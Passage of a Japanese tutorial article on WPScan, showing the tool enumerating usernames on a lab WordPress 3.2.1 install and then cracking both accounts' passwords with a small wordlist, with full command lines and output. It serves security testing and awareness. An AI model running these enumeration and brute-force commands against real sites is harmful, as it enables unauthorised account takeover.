RSS Feed  Twitter  
|
Articles - Tools

ユーザー名の調査とパスワードクラッキング

次にユーザー名の調査を--enumerateオプションで実行してみる

root@bt:/pentest/web/scanners/wpscan# ./wpscan.rb --url lamp/wordpress-3.2.1/ --enumerate u
____________________________________________________
 __          _______   _____                  
 \ \        / /  __ \ / ____|                 
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.0

  WordPress Security Scanner by ethicalhack3r.co.uk
 Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

# Copyright (C) 2011 Ryan Dewhurst
# This program comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under certain conditions. See GNU GPLv3.

| URL: http://lamp/wordpress-3.2.1/
| Started on Sat Jul 23 02:03:39 2011

[+] The WordPress theme in use is called twentyeleven
[+] The WordPress http://lamp/wordpress-3.2.1/readme.html file exists.
[+] WordPress version 3.2.1 identified from meta generator.

[+] Enumerating usernames...

We found the following 2 username/s:

admin
TTS

[+] Finished at Sat Jul 23 02:03:45 2011
root@bt:/pentest/web/scanners/wpscan# 

ユーザー名として、adminとTTSの二人が列挙されているのがわかるだろう。

辞書を利用したパスワードアタックは--wordlistオプション、--threadsオプション、usernameオプションなどを組み合わせて行うことができる。
たとえば、adminというユーザー名を指定、辞書にdic.txtを指定して、アタックを行う場合には、

ruby ./wpscan.rb --url www.example.com –wordlist dic.txt --username admin

という指定をすればよいわけだ。今回は、デキレースではないが、10個の単語を辞書(test.txt)として、その中に該当するパスワードが存在するという状況でテストしている。テストは上記のadmin/TTSの二人のユーザーが存在するWordPress環境である。

root@bt:/pentest/web/scanners/wpscan# ./wpscan.rb --url lamp/wordpress-3.2.1/ --wordlist test.txt
____________________________________________________
 __          _______   _____                  
 \ \        / /  __ \ / ____|                 
  \ \  /\  / /| |__) | (___   ___  __ _ _ __  
   \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
    \  /\  /  | |     ____) | (__| (_| | | | |
     \/  \/   |_|    |_____/ \___|\__,_|_| |_| v1.0

  WordPress Security Scanner by ethicalhack3r.co.uk
 Sponsored by the RandomStorm Open Source Initiative
_____________________________________________________

# Copyright (C) 2011 Ryan Dewhurst
# This program comes with ABSOLUTELY NO WARRANTY.
# This is free software, and you are welcome to redistribute it
# under certain conditions. See GNU GPLv3.

| URL: http://lamp/wordpress-3.2.1/
| Started on Sat Jul 23 02:04:31 2011

[+] The WordPress theme in use is called twentyeleven
[+] The WordPress http://lamp/wordpress-3.2.1/readme.html file exists.
[+] WordPress version 3.2.1 identified from meta generator.

[+] Enumerating usernames...

We found the following 2 username/s:

admin
TTS

[+] Starting the password brute forcer

Brute forcing admin with 10 passwods...
Brute forcing TTS with 10 passwods...
SUCCESS! Username:TTS Password:dead

SUCCESS! Username:admin Password:admin


[+] Finished at Sat Jul 23 02:04:51 2011
root@bt:/pentest/web/scanners/wpscan# 

ユーザー名の列挙に続いて、二人のパスワードがクラックされているのがわかるだろう。パスワードクラックでは、前述したように、スレッドを指定することもできるので、たとえば、50スレッドを指定するのであれば、—threads 50を付加すればよいだけだ。

最後に

WordPressの人気を考えれば、サイト構築に利用しているユーザーは膨大な数であることは言うまでもなく、また、WordPressおよびプラグインの脆弱性、そして脆弱なパスワードによって、それらのサイトがクラックされているケースも膨大な数なのである。本サイトのニュースで紹介しているようなデーターベース漏洩事件でも、WordPressで構築されたサイトが度々登場している。

WPScanは、WordPressのバージョンなどの基本ともいえる事前調査~WordPressおよびプラグインの既知の脆弱性の有無の調査を簡単に行えるツールといえるだろう。


|